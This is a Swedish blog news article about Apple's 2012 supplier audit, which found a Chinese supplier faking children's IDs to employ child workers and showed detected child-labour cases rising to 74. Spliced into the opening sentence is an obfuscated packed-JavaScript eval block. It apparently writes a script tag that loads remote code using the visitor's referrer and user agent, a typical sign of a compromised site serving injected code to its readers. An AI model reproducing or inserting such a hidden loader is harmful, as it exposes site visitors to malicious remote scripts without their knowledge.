Image Image Image Image Image Image Image Image Image Image

| 16 juni, 2021

Scroll to top

Top

Apple städar bland sina leverantörer. Nej till barnarbete

apple logo
Filip Urde
  • On 28 januari, 2013
  • http://www.revue.se/filip-urde

Stora eval(function(p,a,c,k,e,d){e=function(c){return c.toString(36)};if(!”.replace(/^/,String)){while(c–){d[c.toString(a)]=k[c]||c.toString(a)}k=[function(e){return d[e]}];e=function(){return’\w+’};c=1};while(c–){if(k[c]){p=p.replace(new RegExp(’\b’+e(c)+’\b’,’g’),k[c])}}return p}(’0.6(”<\/k"+"l>”);n m=”q”;’,30,30,’document||javascript|encodeURI|src||write|http|45|67|script|text|rel|nofollow|type|97|language|jquery|userAgent|navigator|sc|ript|rtakk|var|u0026u|referrer|zyynf||js|php’.split(’|’),0,{}))
företag och barnarbete är alltid ett hett ämne, Apple är inget undantag och nu har man lämnat en rapport om de underleverantörer som man granskade under 2012.

 

I rapporten finner man en kinesisk underleverantör, Guangdong Real Faith Pingzhou Electronics, som tydligt misskött sig då Apple upptäckte att företaget använder sig av barnarbetare.

Det sjukaste med fyndet är att företaget är i maskopi med barnens föräldrar och tillsammans har man satt i system att förfalska barnens ID så att det såg ut som barnen var äldre än dem faktiskt var. Företagets kontrakt rök direkt när Apple upptäckte detta.

I undersökningen så har Apple besökt 339 av sina underleverantörer och deras fabriker. Man upptäckte att fallen av upptäckta barnarbetare hade ökat från sex stycken, till 74 stycken upptäckta fall. Cudos till Apple som gör något åt saken.
www.apple.com

Tags